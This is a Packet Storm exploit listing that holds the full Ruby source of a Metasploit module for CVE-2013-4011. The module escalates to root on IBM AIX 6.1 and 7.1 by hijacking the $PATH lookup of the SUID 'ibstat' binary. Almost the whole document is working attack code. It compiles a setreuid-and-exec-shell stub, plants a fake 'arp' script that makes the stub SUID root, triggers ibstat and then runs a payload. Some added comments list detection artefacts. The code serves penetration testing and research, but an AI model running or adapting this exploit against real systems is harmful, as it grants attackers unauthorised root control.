
ibstat $PATH Privilege Escalation

2014-04-0300:00:00
Kristian Hermansen
packetstormsecurity.com
28

EPSS

0.001

Percentile

51.2%

`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class Metasploit4 < Msf::Exploit::Local  
# Local privilege-escalation module for CVE-2013-4011: the AIX "ibstat" binary  
# is SUID root and resolves a helper program through the caller's $PATH  
# (see the Description below).  
#  
# Observable artefacts on the target, all created in the WritableDir  
# directory (default "/tmp"): a mode-4555 root-owned helper (compiled from a  
# C stub when gcc is present, otherwise a copy of /bin/sh) and a mode-0555  
# shell script named "arp". These are the host-based detection points for  
# this module; every dropped file is registered with FileDropper for cleanup.  
  
Rank = ExcellentRanking  
  
include Msf::Post::File  
include Msf::Exploit::FileDropper  
  
# Module metadata plus the single option, WritableDir: a directory the  
# session can write to and execute from (default "/tmp").  
def initialize(info = {})  
super(update_info(info,  
"Name" => "ibstat $PATH Privilege Escalation",  
"Description" => %q{  
This module exploits the trusted $PATH environment variable of the SUID binary "ibstat".  
},  
"Author" => [  
"Kristian Erik Hermansen", #original author  
"Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>", #Metasploit module  
"Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>" #Metasploit module  
],  
"References" => [  
["CVE", "2013-4011"],  
["OSVDB", "95420"],  
["BID", "61287"],  
["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827"],  
["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756"]  
],  
"Platform" => ["unix"],  
"Arch" => ARCH_CMD,  
"Payload" => {  
"Compat" => {  
"PayloadType" => "cmd",  
"RequiredCmd" => "perl"  
}  
},  
"Targets" => [  
["IBM AIX Version 6.1", {}],  
["IBM AIX Version 7.1", {}]  
],  
"DefaultTarget" => 1,  
"DisclosureDate" => "Sep 24 2013"  
))  
  
register_options([  
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])  
], self.class)  
end  
  
# Looks for a SUID, root-owned ibstat under /usr/sbin (stderr discarded).  
# Any occurrence of "ibstat" in the find output is reported as Vulnerable,  
# otherwise Safe.  
# NOTE(review): #check searches /usr/sbin while #exploit invokes  
# /usr/bin/ibstat; the two locations are not reconciled in this module.  
def check  
find_output = cmd_exec("find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null")  
  
if find_output.include?("ibstat")  
return Exploit::CheckCode::Vulnerable  
end  
  
Exploit::CheckCode::Safe  
end  
  
# Runs the escalation: aborts when #check reports Safe, drops the helper  
# and the "arp" script into WritableDir, prepends WritableDir to $PATH,  
# invokes ibstat, restores $PATH, runs the helper and, only if `id` then  
# reports uid/euid 0, executes the configured command payload.  
def exploit  
if check == Exploit::CheckCode::Safe  
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")  
else  
print_good("Target is vulnerable.")  
end  
  
# Random name for the helper; "arp" is fixed because that is the name the  
# SUID binary presumably looks up via $PATH (inferred from the module, not  
# shown by the code here).  
root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"  
arp_file = "#{datastore["WritableDir"]}/arp"  
# C stub: set uid/gid to 0 and exec a shell. Compiled only when gcc exists.  
c_file = %Q^#include <stdio.h>  
  
int main()  
{  
setreuid(0,0);  
setregid(0,0);  
execve("/bin/sh",NULL,NULL);  
return 0;  
}  
^  
# Script expected to be run by ibstat with root privileges: it makes the  
# helper root-owned and SUID (mode 4555).  
arp = %Q^#!/bin/sh  
  
chown root #{root_file}  
chmod 4555 #{root_file}  
^  
  
# Helper binary: the compiled C stub if gcc is available, otherwise a plain  
# copy of /bin/sh. The source file is cleaned up; the binary is registered  
# below in both cases.  
if gcc_installed?  
print_status("Dropping file #{root_file}.c...")  
write_file("#{root_file}.c", c_file)  
  
print_status("Compiling source...")  
cmd_exec("gcc -o #{root_file} #{root_file}.c")  
print_status("Compilation completed")  
  
register_file_for_cleanup("#{root_file}.c")  
else  
cmd_exec("cp /bin/sh #{root_file}")  
end  
  
register_file_for_cleanup(root_file)  
  
print_status("Writing custom arp file...")  
write_file(arp_file,arp)  
register_file_for_cleanup(arp_file)  
cmd_exec("chmod 0555 #{arp_file}")  
print_status("Custom arp file written")  
  
# Saves the current $PATH and prepends WritableDir.  
# NOTE(review): this assumes the session shell keeps environment changes  
# between separate cmd_exec calls — not verified here.  
print_status("Updating $PATH environment variable...")  
path_env = cmd_exec("echo $PATH")  
cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH")  
cmd_exec("export PATH")  
  
# Invokes the SUID binary so that "arp" resolves from WritableDir first;  
# its stdout and stderr are discarded.  
print_status("Triggering vulnerablity...")  
cmd_exec("/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null")  
  
# The $PATH variable must be restored before the payload is executed  
# in cases where an euid root shell was gained  
print_status("Restoring $PATH environment variable...")  
cmd_exec("PATH=#{path_env}")  
cmd_exec("export PATH")  
  
# Runs the (now SUID-root) helper, then verifies privileges with `id`  
# before running the payload; nothing is executed if #is_root? is false.  
cmd_exec(root_file)  
print_status("Checking root privileges...")  
  
if is_root?  
print_status("Executing payload...")  
cmd_exec(payload.encoded)  
end  
end  
  
# True when `whereis -b gcc` prints a path (any "/" in its output),  
# false otherwise. Prints a status line either way.  
def gcc_installed?  
print_status("Checking if gcc exists...")  
gcc_whereis_output = cmd_exec("whereis -b gcc")  
  
if gcc_whereis_output.include?("/")  
print_good("gcc found!")  
return true  
end  
  
print_status("gcc not found. Using /bin/sh from local system")  
false  
end  
  
# Runs `id` on the session and returns true when its output contains  
# "euid=0(root)" (checked first) or "uid=0(root)"; otherwise prints  
# "Exploit failed" and returns false.  
def is_root?  
id_output = cmd_exec("id")  
  
if id_output.include?("euid=0(root)")  
print_good("Got root! (euid)")  
return true  
end  
if id_output.include?("uid=0(root)")  
print_good("Got root!")  
return true  
end  
  
print_status("Exploit failed")  
false  
end  
  
end  
`